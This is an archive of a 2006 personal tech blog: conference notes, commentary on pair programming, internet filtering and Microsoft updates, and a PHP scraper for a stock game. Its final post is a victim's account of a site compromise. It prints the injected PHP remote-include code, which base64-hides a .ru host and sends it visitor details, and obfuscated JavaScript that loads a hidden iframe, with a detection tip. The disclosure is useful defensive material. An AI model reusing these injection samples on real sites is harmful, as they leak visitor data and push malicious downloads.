Building an Asynchronous Multiuser Web App for Fun … and Maybe Profit

July 26th, 2006

Here are the slides for my talk today.

I will put up a cleaner verison of the code in a couple of weeks, but here is today’s verison. It comes with an iron clad guarantee about its bug free status. I just won’t tell you exactly what I am guaranteeing.
poker.pdf
poker_0.1.zip
The mysqldump of the database

OSCON

July 22nd, 2006

OSCON06

This year I am doing a tutorial (with Laura) called Building an Asynchronous Multiuser Web App for Fun … and Maybe Profit and a session called Measuring Open Source Popularity.

OSCON is always great, I don’t imagine this year will be an exception.

Combustible Dells

June 29th, 2006

I thought it was funny to see Greenpeace congratulating Dell for agreeing to phase out “all types of brominated flame retardents” in the same week as The Inquirer published photos of a Dell laptop exploding fairly spectacularly.

According to Greenpeace, most computer users are willing to pay extra for a “greener” computer. I wonder if they are willing to pay extra for a computer that does not burst into flames too?

Dell Configurator

Pair Programming

March 8th, 2006

This pair programming study was being passed around at work, which always sends a chill down my spine.

In case you are not familiar with this confronting practice,

The official definition of pair programming is two programmers working together, side by side, at one computer collaborating on the same analysis, design, implementation, and test. In other words, consider it like two programmers using one pencil.

Its main thrust of the paper is that working as a pair each programmer achieved 227% of the average level of output in the organisation. Fascinating stuff, but not without its difficulties. I am not convinced that lines of code is a meaningful way to measure programmer productivity. I suspect that the average programmer might easily double their output by this measure just by being told that the lines of code they commit is being tallied.

By this measure I should have been paying to come to work this month. My main task has been refactoring about 6000 lines of code into about 2000 lines of code. I appear to have been doing negative amounts of work.

But that is all a side note, I was much more fascinated by the effect of pair programming on error rates. The summary data is helpfully provided as an image of a table. Errors decreased by three orders of magnitude.

Which sounds great, but think for a minute what that means. The author chooses not to disclose the normal error rate for solo programmers in the organisation, except to say that it was in line with the industry at the time. One data point given though is that a 10000 line task delivered by pairs had only two coding errors and one design error. That sounds pretty good to me … but if the pairs were producing 0.001 times the errors of solo programmers as the study claims, then solo programmers would have been expected to deliver 2000 coding errors and 1000 design errors in the same 10000 line task.

One coding error per five lines of code, and one design error per ten lines of code seems highly improbable to me, unless each pair consisted of one programmer doing 80% of the work and one rhesus monkey who without supervision would have just bashed keys randomly. Today of course, people would probably assume the output produced by the monkey was a valid Perl program, but as Perl had not been invented when the experiment was conducted I guess they spotted them as errors.

I remain unconvinced, and cannot think of pair programming without thinking of the PairOn chair … with apologies to Cenqua who I stole the image from and HermanMiller who they stole the dot com bubble icon the Aeron from.

PairOn

OfficePirates.com - Calling all slackers

March 1st, 2006

OfficePirates.com is an interesting venture*. They are aimed specifically at the 21-34 year old, male, office worker who hates his job and spends more time surfing the web than working demographic. Did you know that was a demographic? Now I will admit it is not quite like one of those job ads you sometimes read that say “To be considered, the applicant should have between 4.3 and 4.32 years C++ experience, like french fry sandwiches and be named Bob,” but it still seems fairly specific to me.

Of course, in time honoured Web 2.0 style, viral marketing is a big part of the plan. Their hordes of office slackers are, as we speak, supposed to be emailing each other to say “Have you seen the Girls in Bras video? It is hilarious.”

There are a few small problems with the plan though, the video is not hilarious, and the people behind it seem to have only passing familiarity with some standard internet practices. For example, the comment field in their blog looks like this whenever I look at it:

Closed?

Did you used to think the internet operated 24 hours a day? So did I. I am not even sure what time zone that 9-6 is in, but apparently there is only one.

Some of their stuff is quite good. I liked Half day man, and they have money and a marketing budget behind them so being initially a bit thin on content will presumably be easy to solve, but it is hard to run a major website when you don’t seem to understand the genre conventions and when parts of your technology suck. I hate the Flash video player they are using. It does not cache content, so if your connection struggles you can’t pause and wait for the download to catch up. You just have to watch it stutter.

I also keep seeing [an error occurred while processing this directive]. What is that? A server side include error message, or an early version of ASP error message? How very Web 1.0.

* and I am not only saying that because I own lots of their stock on Alexadex, or because they have a really cool logo

Update: OfficePirates.com was shut down on September 1 after failing to find an audience. Personally, I only noticed six months later because I had a broken link.

Internet Filtering is Dumb

February 28th, 2006

This is not a new story, but the topic of internet content filtering comes up from time to time, so I wanted to post this picture while I remember where it is.

Dumb Internet Filtering

From time to time, somebody suggests that filtering internet content at various points would be a good idea. Invariably, the argument behind it is “Think of the Children. Who is looking out for our children?”

There are all sorts of reasons why the concept is flawed, but one big gaping problem that most people seem to ignore is that filtering software is dumb. Human classifiers would make errors, but manual classification cannot possibly cope with the volume of existing and new content, so filtering software has to try to classify material based on a set of rules. This is always going to fail, both passing content that will offend and blocking inoffensive, important content.

This is not a very sharp photo, but it is the screen of a public internet terminal. The site I am attempting to view in my own twisted, lascivious way is http://tickets.amtrak.com/. Now instead of the pictures of train timetables without any clothes on that I was expecting to see, instead I get, “This page has been blocked by the Content Filter because it may contain adult content not suitable for a public environment”.

Who is looking out for our adults? Whether they are (relatively) clean living tourists trying to buy a train ticket from Portland to Seattle, or whether they are anorak wearing, trainspotting weirdos who get a perverse kick from looking at Amtrak fare information does not really matter. Adults should be free to look at this and similar transport related “adult content” without having to apply for permission.

On a related note, because filtering software is so dumb, parents should not allow themselves to be lulled into a false sense of security thinking that a machine is doing their job for them. Do you know where your teenager is now? At this very minute, they could be perusing a hard core bus timetable, or even scouring the net for uncensored videos of 747s taking off.

Fun with Alexadex

February 27th, 2006

In case you are not aware, Alexadex is a virtual stock market game, where the values of stocks depend on their Alexa reach ratings.

Because I have too much time on my hands, I wanted to track my portfolio value in the sidebar of my blog. Look over there somewhere —–> and you will probably see it.

In case it holds amusement value to somebody, here is the code. It relies on PHP and MySQL and just does some simple screen scraping.

The fact that this URL works:
http://alexadex.com/ad/api?&method=getQuote&url=lukewelling.com
hints that there might be an API to do this at some point, but for now, I am screen scraping. (url pulled from Cal Evans’ blog)

The database table looks like this:

CREATE TABLE alexadex (
  timestamp timestamp(14) NOT NULL,
  value int(11) NOT NULL default '0',
  PRIMARY KEY  (timestamp)
)

From a cron job I am running:

<?php
require('functions.php');

connectToDb();

$username = 'tangledweb';
$url = "http://alexadex.com/ad/user/$username";
$marker = 'total:</b></td><td align=right>$';

$current =  scrape( $url, $marker );
if($current!==false)
{
   echo "stored: ";
   storeCurrent($current);
}

echo $current; 

?>


In case it is not obvious, my Alexadex username is tangledweb.

In my blog sidebar I have:

<?php
require('functions.php');
echo '<li><a href = "http://alexadex.com/ad/user/tangledweb"
      >My current portfolio is $';
$temp = getMostRecentFromDb();
echo number_format($temp['value']).'</a>';
?>

The functions these rely on are:

function storeCurrent($value)
{
 $value = intval($value);
 $sql = "INSERT
         INTO alexadex
         VALUES (NOW(), $value)";
  $result = mysql_query($sql);
}

function getMostRecentFromDb()
{
  $sql = "SELECT *
          FROM alexadex
          WHERE 1
          ORDER BY `timestamp` DESC
          LIMIT 1";

  $result = mysql_query($sql);

  return mysql_fetch_array($result);
}

function scrape($url, $marker, $maxLength = 50)
{
  $page = file_get_contents($url);
  if($page === false)
  {
    return false;
  }
  $pos = strpos($page, $marker);
  if($pos === false)
  {
    return false;
  }
  $value= substr($page, $pos + strlen($marker), $maxLength);
  $value= str_replace(',', '', $value);
  $value= intval($value);
  return $value;
}

function connectToDb()
{
  $connection = mysql_connect("host",
                              "user",
                              "pass");
  mysql_select_db("dbname", $connection);
}

This code comes with no warranty of any kind. You can have it as public domain, but I would appreciate a link to this blog if you use it. I hope it still works. WordPress seems to really, really want to mess with it when it saves it.

Microsoft vs. Spyware

February 27th, 2006

OK, I realise that whining about Microsoft is about as passé as whining about taxation, and about as likely to have any effect, but some similarities struck me the other day.

I was cleaning up some spyware or something from some of my websites and I thought it would be a good idea to make sure that all my windows machines had the Microsoft patch for the WMF vulnerability. Start windows update running, click through the defaults, ignore the 792 page EULA and download what Microsoft classifies as “Critical Updates”.

One of the things people hate most about spyware, adware and their associated inbred toolbars and whatnots is that they use deceptive means to fool people into installing them. They either outright lie, or they provide one attractive feature and embed permission to do whatever else in an incomprehensible 792 page EULA.

Some large software companies behave in a remarkably similar way. What I requested from Microsoft, and what it was implied I was getting, was critical security updates. What I got instead was something called “Windows Genuine Advantage”. Now Bill and I clearly have different ideas about what is critical. To me, something that as far as I can tell just allows Microsoft to check if a computer is running a legal copy of windows is not critical to me. In fact it is not even desirable. The only reason I installed it was because the information provided was a mixture of misleading and too long to read in detail.

In the medium and long term, I think it works to everybody’s disadvantage. The last thing the world needs are more unpatched windows machines connected to the internet, regardless of whether they are unpatched because of owner inaction, or because Microsoft decided to stop providing patches to machines with serial numbers it dislikes, the end effect is the same. More zombie machines wasting bandwidth and probing others because they have been infiltrated through well known vulnerabilities.

The IT Crowd episode 6

February 27th, 2006

Now out, as long as you live in the UK of course.

It was only from hearing the ads in Ricky Gervais Show recently that I realised it is pronounced “The It Crowd”, rather than “The I.T. Crowd”. Oh well.

Spyware and popups close to home

February 27th, 2006

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleezy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it has been altered and code has been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru extension.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps, such as forums and blogs require you to have some files and directories writable, so if you are choosing such software for a shared host see if you can find ones that require as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely checked stuff sitting on a shared host, it would be worth grepping for some distinctive code from that (perhaps “error_reporting(0)”) to make sure you are not in the same boat.

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate these sort of business practices and the arseclowns that practice them, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)))
{}
else {
include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

or


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

which un-obsfucated is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>

In one file I also found:

<a href = "http://mrsnebraskaamerica.com/catalog/images/sierra/hackmai-2.0.shtml" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic sounding names created, like date.php and report.php and .htaccess files created or appended to to direct 404s to the new bogus files.